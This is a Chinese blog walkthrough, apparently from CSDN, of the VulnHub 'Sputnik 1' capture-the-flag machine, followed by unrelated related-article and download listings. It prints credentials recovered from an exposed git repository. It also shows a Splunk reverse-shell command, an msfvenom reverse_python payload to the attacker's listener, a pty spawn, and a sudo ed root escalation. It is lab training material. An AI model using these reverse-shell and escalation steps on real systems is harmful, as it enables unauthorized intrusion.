vulnhub-Sputnik 1靶机

最新推荐文章于 2026-04-30 10:07:50 发布
原创 最新推荐文章于 2026-04-30 10:07:50 发布 · 770 阅读 · 5 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#安全性测试

vulnhub:https://www.vulnhub.com/entry/sputnik-1,301/

导入靶机,放在kali同网段,扫描

image-20240927164246670

靶机在192.168.114.135,扫描端口

image-20240927164617346

开了三个端口,访问

8089的功能基本都要账户访问

image-20240927164731993

55555端口是个小游戏

image-20240927164918495

之前nmap还找到了一个目录/.git,其中的logs目录下的一个文件让我们去克隆一个项目

https://github.com/ameerpornillos/flappy

image-20240927165036709

61337是个登录界面

image-20240927165153335

克隆项目

git clone https://github.com/ameerpornillos/flappy

查看日志

git log

一一查看日志,最后找到在07fda135aae22fa7869b3de9e450ff7cacfbc717

image-20240927165943355

git ls-tree 07fda135aae22fa7869b3de9e450ff7cacfbc717

image-20240927170057056

git show f4385198ce1cab56e0b2a1c55e8863040045b085

image-20240927170116914

是账户名和密码

sputnik:ameer_says_thank_you_and_good_job

之前有个登陆界面,尝试登陆,成功

image-20240927170207118

通过在网上查找,这个splunk有一个利用工具

https://github.com/TBGSecurity/splunk_shells

下载,然后上传到kali,在网站内安装

image-20240927170540488

image-20240927170553616

image-20240927170605194

image-20240927170629348

上传完成后重新启动

image-20240927170646217

再次登录会直接来到软件管理界面,设置软件权限

image-20240927170816952

image-20240927170835942

设置完成后来到网站的搜索框,输入反弹shell命令

| revshell std 192.168.114.128 6789

image-20240927170958340

kali开启监听,获取到shell

image-20240927171405146

想要执行sudo -l得先获取交互式shell,使用msfvenom生成payload

msfvenom -p cmd/unix/reverse_python lhost=192.168.114.128 lport=9876 R

image-20240927171925894

监听9876端口,在原有的shell运行payload,获取到新的shell后生成交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

image-20240927172723408

sudo -l显示我们可以使用ed,查找漏洞网站使用方式

image-20240927172804215

只需要在ed里输入!/bin/bash

image-20240927172858081

提权成功,flag在/root文件夹

生草工坊
关注
Vulnhub靶机Sputnik 1
所有文章均免费阅读,大家一起学习
06-27 1440
有效载荷通过我们现有的 Netcat 会话上传,需要做的就是将有效载荷粘贴到终端并执行,在执行之前,需要再监听6666端口,也就是Msfvenom 创建一个python交互式shell。继续访问Logs目录并单击其中的HEAD文件:http://192.168.233.143:55555/.git/logs/HEAD。在最后一条发现部署上传成功!点击:Permissions,勾选:All apps,点击:Save保存,在网站检索ed命令,看看有没有提权的方式,选择sudo的形式,找到提权payload。
vulnhub靶场-Sputnik
qq_42947816的博客
10-16 1907
Sputnik是一款易用级别的boot2root机器,旨在为安全爱好者提供学习和实践危害机器和渗透测试的挑战。
vulnhubSputnik打靶渗透
weixin_62162207的博客
08-05 443
Sputnik靶机:打靶训练
ISTA 3A 2008 包裹运输包装:安全性测试 + 质量测试全流程实操指南
fgjcbai的博客
04-30 549
对于≤70kg 的包裹类运输包装,安全性测试解决 “运输不破损、产品不损坏、密封不泄漏” 的安全问题,质量测试解决 “结构合规、性能稳定、量产达标” 的质量问题。
FSB628.pdf
06-23
FSB628
FS5379.PDF
06-23
FS5379.PDF
stm32单片机项目资料课程设计文档C语言程序代码原理图电路PCB实例AVR最小系统板DXP资料及其相关资料
06-23
stm32单片机项目资料课程设计文档C语言程序代码原理图电路PCB实例AVR最小系统板DXP资料及其相关资料
AI绘画扩散模型原理图集-StableDiffusion核心组件详解
06-23
# 扩散模型原理图集说明(学习和写文章用) 1. **LoRA**:W=W₀+B·A低秩分解,压缩256倍,零初始化,可合并推理零开销。 2. **Checkpoint**:含UNet/VAE/CLIP,z_T→去噪→z₀→VAE解码出图。 3. **ControlNet**:可训练分支+ZeroConv注入冻结UNet,7种条件控制。 4. **IP-Adapter**:解耦交叉注意力,图像/文本独立K/V,α控制图像强度。 5. **VAE**:48倍压缩至潜空间,L_rec+L_KL联合训练。 6. **CLIP**:双塔对比学习,为UNet提供文本条件。 7. **CFG**:ε̂=ε_∅+s·(ε_c-ε_∅),s=7~12引导增强。 8. **Diffusion**:前向加噪→反向UNet去噪,线性/余弦调度。 9. **SAM**:三大模块+四种提示,输出3个Mask选最优。 10. **Upscale**:RRDB+PixelShuffle,L1+感知+GAN三损失。 11. **采样器**:随机(DDPM/Euler a)vs确定性(DDIM/DPM++2M)。 12. **调度器**:β→α→ᾱ→σ,Linear/Cosine/Karras曲线。 13. **Karras**:σ幂律,ρ=7最优,低噪声区多步保细节。
【解决大规模MIMO系统的数据检测问题】混合框架来改善VP中格降(LR)辅助预编码的性能(Matlab代码实现)
06-23
内容概要:本文提出一种针对大规模MIMO系统中数据检测问题的混合优化框架,旨在提升矢量扰动(VP)预编码下格归约(LR)辅助技术的性能。该方法通过融合格归约算法与预编码设计策略,有效改善信号检测精度与系统鲁棒性,尤其在高维MIMO场景中展现出优越的误码率表现与收敛特性。研究重点在于降低传统LR辅助检测的计算复杂度,同时保持高性能增益,结合Matlab代码实现了完整的仿真验证框架,为5G/6G通信系统中的关键技术提供了可复现的技术路径。; 适合人群:具备通信工程、信号处理或电子信息等相关专业背景,熟悉MIMO通信系统原理与数字信号处理技术的研究生、科研人员及通信领域工程师;具有一定算法设计能力并从事无线通信系统优化工作的技术人员。; 使用场景及目标:① 提升高维MIMO系统中VP预编码的数据检测效率与准确性;② 克服传统格归约方法在复杂信道环境下性能受限的问题;③ 提供一套完整的Matlab仿真工具链,支持学术研究中的算法对比、性能评估与进一步优化。; 阅读建议:建议读者结合提供的Matlab代码逐模块分析其实现逻辑,重点关注格归约与预编码之间的协同机制,通过调整系统维度、信道模型与参数配置进行仿真实验,深入理解该混合框架在不同场景下的性能边界与优化潜力。
易语言源码易语言超级信使源码
06-23
易语言源码易语言超级信使源码
高鲲教育学习资源站.html
06-23
高鲲教育学习资源站.html
考虑电动汽车聚合可调节能力的含波动性电源电氢耦合系统多目标优化运行研究(Matlab代码实现)
最新发布
06-23
内容概要:本文围绕“考虑电动汽车聚合可调节能力的含波动性电源电氢耦合系统多目标优化运行”展开研究,提出了一种基于Matlab代码实现的多目标优化模型。该模型深度融合电-氢耦合系统与高比例波动性可再生能源(如风电、光伏),充分挖掘电动汽车(EV)集群作为移动储能单元的灵活调节潜力,通过聚合调控提升系统对新能源的消纳能力与运行经济性。研究系统构建了电动汽车可调度能力、电解水制氢与储氢动态过程、多能源协同互补的优化调度框架,并结合智能优化算法实现经济性、低碳性与运行稳定性等多重目标的协同优化。文中配套提供了完整的Matlab仿真代码、相关数据及可能的论文支撑材料,极大地方便了模型的复现、验证与后续深化研究。; 适合人群:具备电力系统、综合能源系统、优化理论或新能源技术等相关领域基础知识的研究生、科研人员,以及从事新型电力系统规划、清洁能源消纳与智慧能源管理的工程技术人员。; 使用场景及目标:①开展高渗透率可再生能源接入下的综合能源系统多目标优化调度研究;②探究电动汽车集群在电网削峰填谷、平抑新能源出力波动及提供辅助服务方面的应用价值与潜力;③学习并掌握电氢耦合系统的建模方法、多目标优化求解技术及其在Matlab/Simulink环境下的仿真实现流程。; 阅读建议:此资源不仅提供可运行的代码,更蕴含了前沿的科研思路与创新方法,建议读者结合所提供的代码、数据与可能的论文文档,系统性地学习从问题建模、算法设计到仿真分析的完整科研过程,并重点关注其中关于需求侧资源聚合、多能互补协同与绿色低碳运行的核心理念。
经济学期刊论文复现:数字化转型能促进企业的高质量发展吗
06-23
内容概要:本文档名为《经济学期刊论文复现:数字化转型能促进企业的高质量发展吗》,表面上聚焦于经济学领域中数字化转型对企业高质量发展影响的研究,实则是一份涵盖多学科交叉的科研仿真代码资源合集。资源以Matlab、Simulink、Python为主要工具,系统整合了电力系统仿真、微电网优化调度、路径规划、信号处理、图像处理、机器学习预测模型等方向的可复现算法与仿真模型。尽管标题指向经济学实证分析,但内容重心在于提供顶级期刊论文的复现代码,如企业全要素生产率(TFP)测算方法(OL、FE、LP、OP、GMM)、风光储氢系统优化、需求响应与综合能源系统调度等,并融合智能优化算法与深度学习技术进行数据建模与预测分析,体现出极强的工程化与科研实用性。; 适合人群:具备一定编程基础,熟练掌握Matlab/Simulink/Python等仿真工具,从事工程仿真、经济实证研究或交叉学科科研工作的研究生、高校教师及科研人员。; 使用场景及目标:① 复现经济学顶刊论文中的计量经济模型,深入探究数字化转型对企业全要素生产率的影响机制;② 借助提供的代码资源开展电力系统故障仿真、微电网优化、多能系统调度等科研项目的算法验证与仿真分析;③ 应用机器学习与深度学习模型完成负荷预测、风电光伏出力预测、电池健康状态评估等典型实证任务; 阅读建议:此资源虽冠以经济学论文之名,实质为多领域高价值仿真代码集成,建议读者依据自身研究方向筛选适配内容,优先关注“顶刊复现”“论文复现”类项目,结合配套数据与代码进行实证推演,并通过公众号“荔枝科研社”获取完整资料与持续技术支持。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值